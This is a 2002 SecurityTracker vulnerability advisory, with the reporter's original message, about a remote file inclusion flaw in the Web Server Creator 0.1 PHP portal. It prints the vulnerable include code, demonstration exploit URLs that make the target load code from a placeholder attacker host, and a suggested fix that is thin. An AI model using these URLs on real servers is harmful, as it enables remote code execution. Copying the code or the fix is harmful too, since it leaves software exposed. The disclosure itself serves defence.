Web Server Creator Include File Error Enables Remote Users to Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1005712
|
|
SecurityTracker URL: http://securitytracker.com/id?1005712
|
|
CVE Reference: CVE-2002-2217
(Links to External Site)
|
Updated: Jun 8 2008
|
Original Entry Date: Nov 26 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 0.1
|
Description: A vulnerability was reported in the Web Server Creator PHP scripts. A remote user can execute arbitrary commands on the target server.
It is reported that the 'news/include/customize.php' script and the 'index.php' script both reference include files without specifying
the file locations. A remote user can create a specially crafted URL that specifies a remote location for the include file so that
the web server will execute code in the remotely located file.
Some demonstration exploit URLs are provided:
http://[target]/news/include/customize.php?l=http://[at
tacker]/file.txt
with
http://[attacker]/file.txt
http://[target]/index.php?pg=http://[attacker]/badfile
with
http://[attacker]/badfile.php
|
Impact: A remote user can execute arbitrary commands on the target server with the privileges of the web server process.
|
Solution: No solution was available at the time of this entry.
The author of the report has provided the following instructions for fixing
the flaw:
- Delete bugged lines in news/include/customize.php
- In index.php replce this line :
require ("$pg.php");
by :
-------------------
if
(file_exists($pg.".php")){
require ("$pg.php");
}
-------------------
|
Vendor URL: webcreator.com02.com (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Underlying OS Comments: PHP-based
|
Reported By: "Frog Man" <leseulfrog@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 25 Nov 2002 17:33:41 +0100
From: "Frog Man" <leseulfrog@hotmail.com>
Subject: Web Server Creator - Web Portal 0.1 (PHP)
|
Informations :
°°°°°°°°°°°°°°
Website : http://webcreator.com02.com
Tested version : 0.1
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
news/include/customize.php :
------------------
<?
$langfile = $l;
include $l;
?>
------------------
index.php :
-----------------------------------
[...]
if (!$pg) { $pg = "acceuil"; }
[...]
require ("$pg.php");
?>
[...]
-----------------------------------
Exploits :
°°°°°°°°°°
http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with
http://[attacker]/file.txt
and
http://[target]/index.php?pg=http://[attacker]/badfile
with
http://[attacker]/badfile.php
Solution :
°°°°°°°°°°
- Delete bugged lines in news/include/customize.php
- In index.php replce this line :
require ("$pg.php");
by :
-------------------
if (file_exists($pg.".php")){
require ("$pg.php");
-------------------
A patch can be found on http://www.phpsecure.org.
More details :
°°°°°°°°°°°°°°
In french :
http://www.frog-man.org/tutos/WSC-WebPortal.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txt&
langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
frog-m@n
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
|
|
